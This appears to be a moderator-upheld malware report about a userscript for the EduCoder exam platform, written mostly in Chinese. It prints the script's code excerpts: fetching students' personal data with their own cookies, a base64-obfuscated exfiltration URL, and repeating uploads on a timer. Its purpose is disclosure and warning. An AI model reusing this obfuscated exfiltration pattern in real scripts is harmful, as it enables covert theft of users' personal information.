头歌平台考试脚本 was reported 29. 06. 2026 for Malware
1. 窃取用户隐私信息
fetchUserInfo 函数 调用 https://data.educoder.net/api/users/get_user_info.json ,提取以下字段:
Plain Text
username, real_name, user_identity, identity, phone,
school_province, department_name, edu_background,
edu_entry_year, student_id, user_school_id, school_name
包含真实姓名、手机号、学号、学校、入学年份等敏感信息。
2. 隐蔽外传到作者服务器
collectUserInfo 函数 把上述信息 POST 到一个 base64 编码隐藏的 URL:
JavaScript
const encodedUrl = 'aHR0cHM6Ly93d3cucGFuc291bC5zcGFjZS9hcGkvdXNlci1pbmZv';
return atob(encodedUrl);
解码后是:https://www.pansoul.space/api/user-info
使用 base64 编码 URL 是典型的恶意代码规避检测手法——普通用户搜代码时不会一眼看到 pansoul.space 这个域名。
3. 定时持续上报
第 2504-2508 行:
JavaScript
setTimeout(async () => {
await FuckEduCoder.collectUserInfo();
}, 2000);
setInterval(FuckEduCoder.collectUserInfo, 300000); // 每5分钟收集一次
脚本启动 2 秒后就上报一次,之后每 5 分钟持续上报一次,只要你开着考试页面就一直传。
作案链条还原
Plain Text
1. 用户安装脚本(看到的是"破解考试监控+AI答题"功能)
↓
2. 脚本启动 2 秒后调用 collectUserInfo()
↓
3. fetchUserInfo() 用用户自己的 cookie 调用 educoder 官方 API
↓ (credentials: 'include' 借用登录态)
4. 拿到真实姓名/手机号/学号/学校等 PII
↓
5. POST 到 https://www.pansoul.space/api/user-info (base64 隐藏)
↓
6. 每 5 分钟重复一次
作者域名 pansoul.space 与 metadata 中 @author pansoul、@icon pansoul.asia 一致——就是脚本作者本人的服务器。
pansoul (the reported user) has made:
This report has been upheld by a moderator.